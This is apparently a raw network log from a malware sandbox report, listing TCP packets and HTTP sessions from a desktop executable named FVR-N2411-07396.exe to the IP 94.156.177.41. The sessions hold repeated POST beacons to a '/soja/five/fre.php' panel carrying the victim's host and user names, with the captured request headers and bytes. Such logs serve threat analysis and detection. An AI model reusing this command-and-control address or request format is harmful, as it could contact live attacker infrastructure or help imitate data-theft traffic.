                                    Nov 28, 2024 13:53:28.648130894 CET804989794.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:30.067215919 CET804989794.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:30.067284107 CET804989794.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:30.067359924 CET4989780192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:30.067359924 CET4989780192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:30.188658953 CET804989794.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:30.402465105 CET4990280192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:30.523427963 CET804990294.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:30.523536921 CET4990280192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:30.555847883 CET4990280192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:30.675832987 CET804990294.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:30.675909996 CET4990280192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:30.796256065 CET804990294.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:32.107141972 CET804990294.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:32.107192993 CET804990294.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:32.107302904 CET4990280192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:32.107379913 CET4990280192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:32.227330923 CET804990294.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:32.247689009 CET4990880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:32.368060112 CET804990894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:32.368160963 CET4990880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:32.370172977 CET4990880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:32.490528107 CET804990894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:32.490597963 CET4990880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:32.612365961 CET804990894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:33.909647942 CET804990894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:33.909887075 CET804990894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:33.909974098 CET4990880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:33.910015106 CET4990880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:34.031646967 CET804990894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:34.068587065 CET4991380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:34.190502882 CET804991394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:34.190700054 CET4991380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:34.192893982 CET4991380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:34.319197893 CET804991394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:34.319262028 CET4991380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:34.439359903 CET804991394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:35.791979074 CET804991394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:35.792109013 CET4991380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:35.792176008 CET804991394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:35.792231083 CET4991380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:35.912158966 CET804991394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:35.931873083 CET4991780192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:36.051887989 CET804991794.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:36.052036047 CET4991780192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:36.054059029 CET4991780192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:36.174204111 CET804991794.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:36.174268961 CET4991780192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:36.296370029 CET804991794.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:37.671386003 CET804991794.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:37.671478987 CET4991780192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:37.671545029 CET804991794.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:37.671595097 CET4991780192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:37.791691065 CET804991794.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:37.807044983 CET4992380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:37.927257061 CET804992394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:37.927434921 CET4992380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:37.929605961 CET4992380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:38.049577951 CET804992394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:38.049670935 CET4992380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:38.169733047 CET804992394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:39.517520905 CET804992394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:39.517673016 CET4992380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:39.517822027 CET804992394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:39.517875910 CET4992380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:39.637803078 CET804992394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:39.650813103 CET4992880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:39.770937920 CET804992894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:39.771184921 CET4992880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:39.773238897 CET4992880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:39.893312931 CET804992894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:39.893532991 CET4992880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:40.018708944 CET804992894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:41.214277029 CET804992894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:41.214318037 CET804992894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:41.214370966 CET4992880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:41.330753088 CET4992880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:41.452205896 CET804992894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:41.795041084 CET4993180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:41.915349960 CET804993194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:41.915452957 CET4993180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:41.917542934 CET4993180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:42.038815022 CET804993194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:42.038877010 CET4993180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:42.159024000 CET804993194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:43.432657003 CET804993194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:43.433051109 CET4993180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:43.433116913 CET804993194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:43.433171034 CET4993180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:43.571810961 CET4993680192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:43.586239100 CET804993194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:43.691963911 CET804993694.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:43.692066908 CET4993680192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:43.694153070 CET4993680192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:43.814394951 CET804993694.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:43.814507961 CET4993680192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:43.934629917 CET804993694.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:45.291156054 CET804993694.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:45.291275024 CET804993694.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:45.291368961 CET4993680192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:45.291497946 CET4993680192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:45.416486025 CET804993694.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:45.431333065 CET4994280192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:45.554757118 CET804994294.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:45.555039883 CET4994280192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:45.557185888 CET4994280192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:45.677129984 CET804994294.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:45.677206993 CET4994280192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:45.797228098 CET804994294.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:47.149077892 CET804994294.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:47.149209023 CET4994280192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:47.149224997 CET804994294.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:47.149283886 CET4994280192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:47.269320965 CET804994294.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:47.290548086 CET4994880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:47.435441017 CET804994894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:47.435631990 CET4994880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:47.437643051 CET4994880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:47.609695911 CET804994894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:47.609817028 CET4994880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:47.729849100 CET804994894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:48.834009886 CET804994894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:48.834119081 CET4994880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:48.834598064 CET804994894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:48.834650993 CET4994880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:48.954029083 CET804994894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:48.980740070 CET4995180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:49.101228952 CET804995194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:49.101320982 CET4995180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:49.103429079 CET4995180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:49.229300022 CET804995194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:49.229391098 CET4995180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:49.349370003 CET804995194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:50.737694979 CET804995194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:50.737812042 CET4995180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:50.737826109 CET804995194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:50.737884045 CET4995180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:50.857824087 CET804995194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:50.885303020 CET4995480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:51.005997896 CET804995494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:51.006102085 CET4995480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:51.008164883 CET4995480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:51.134726048 CET804995494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:51.134807110 CET4995480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:51.258780956 CET804995494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:52.603863001 CET804995494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:52.603990078 CET4995480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:52.604031086 CET804995494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:52.604087114 CET4995480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:52.724013090 CET804995494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:52.745637894 CET4995980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:52.865706921 CET804995994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:52.865808010 CET4995980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:52.867790937 CET4995980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:52.989197016 CET804995994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:52.989362955 CET4995980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:53.109368086 CET804995994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:54.504672050 CET804995994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:54.504785061 CET4995980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:54.504843950 CET804995994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:54.504894018 CET4995980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:54.624744892 CET804995994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:54.650748014 CET4996580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:54.770740986 CET804996594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:54.770855904 CET4996580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:54.772973061 CET4996580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:54.895523071 CET804996594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:54.895597935 CET4996580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:55.015558004 CET804996594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:56.356708050 CET804996594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:56.356807947 CET4996580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:56.357050896 CET804996594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:56.357095957 CET4996580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:56.476885080 CET804996594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:56.524355888 CET4997080192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:56.644558907 CET804997094.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:56.644659996 CET4997080192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:56.646739006 CET4997080192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:56.768088102 CET804997094.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:56.768163919 CET4997080192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:56.888096094 CET804997094.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:58.089629889 CET804997094.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:58.089737892 CET4997080192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:58.089757919 CET804997094.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:58.089822054 CET4997080192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:58.209769964 CET804997094.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:58.227514982 CET4997580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:58.350323915 CET804997594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:58.350404024 CET4997580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:58.352627993 CET4997580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:58.472846031 CET804997594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:58.476191998 CET4997580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:58.596214056 CET804997594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:59.992137909 CET804997594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:59.992228031 CET4997580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:53:59.992415905 CET804997594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:53:59.992458105 CET4997580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:54:00.112159967 CET804997594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:54:00.152575016 CET4997980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:54:00.413975954 CET804997994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:54:00.414047956 CET4997980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:54:00.416253090 CET4997980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:54:00.536174059 CET804997994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:54:00.536336899 CET4997980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:54:00.656543016 CET804997994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:54:01.812099934 CET804997994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:54:01.812285900 CET4997980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:54:01.812292099 CET804997994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:54:01.812346935 CET4997980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:54:01.933027029 CET804997994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:54:01.949193954 CET4998480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:54:02.069211960 CET804998494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:54:02.069312096 CET4998480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:54:02.071367025 CET4998480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:54:02.191329002 CET804998494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:54:02.191446066 CET4998480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:54:02.311425924 CET804998494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:54:03.511610985 CET804998494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:54:03.511707067 CET4998480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:54:03.511734009 CET804998494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:54:03.511879921 CET4998480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:54:03.631690979 CET804998494.156.177.41192.168.2.5
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Nov 28, 2024 13:52:16.496381044 CET1.1.1.1192.168.2.50x7c7bNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                    Nov 28, 2024 13:52:16.496381044 CET1.1.1.1192.168.2.50x7c7bNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                    • 94.156.177.41
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.54970894.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:04.359332085 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 180
                                    Connection: close
                                    Nov 28, 2024 13:52:04.479690075 CET180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: 'ckav.rualfons040965ALFONS-PCk0FDD42EE188E931437F4FBE2CHQTve
                                    Nov 28, 2024 13:52:05.944139957 CET185INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:05 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.54970994.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:06.283209085 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 180
                                    Connection: close
                                    Nov 28, 2024 13:52:06.410511017 CET180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: 'ckav.rualfons040965ALFONS-PC+0FDD42EE188E931437F4FBE2CEcRqK
                                    Nov 28, 2024 13:52:07.903688908 CET185INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:07 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.54971194.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:08.114020109 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:08.237689018 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:09.514312029 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:09 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.54971294.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:09.952279091 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:10.072483063 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:11.594536066 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:11 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.54971394.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:11.853466988 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:11.973666906 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:13.292371988 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:13 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.54971494.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:13.569083929 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:13.689498901 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:15.014285088 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:14 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.54971594.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:15.273422003 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:15.393769979 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:16.818991899 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:16 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    7192.168.2.54971894.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:17.098931074 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
